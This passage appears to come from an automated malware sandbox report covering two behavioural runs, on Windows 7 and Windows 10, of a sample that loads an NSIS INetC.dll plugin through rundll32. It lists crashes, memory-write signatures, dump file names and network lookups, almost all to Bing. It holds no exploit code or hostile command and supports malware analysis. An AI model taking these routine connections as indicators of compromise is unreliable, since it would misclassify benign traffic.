memory/1808-303-0x0000000005700000-0x0000000005710000-memory.dmp
memory/4092-304-0x00000000005A0000-0x0000000000C14000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win7-20240221-en
Max time kernel
120s
Max time network
124s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 240
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win10v2004-20240412-en
Max time kernel
140s
Max time network
149s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5088 wrote to memory of 3436 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 5088 wrote to memory of 3436 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 5088 wrote to memory of 3436 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3436 -ip 3436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 632
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.32.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |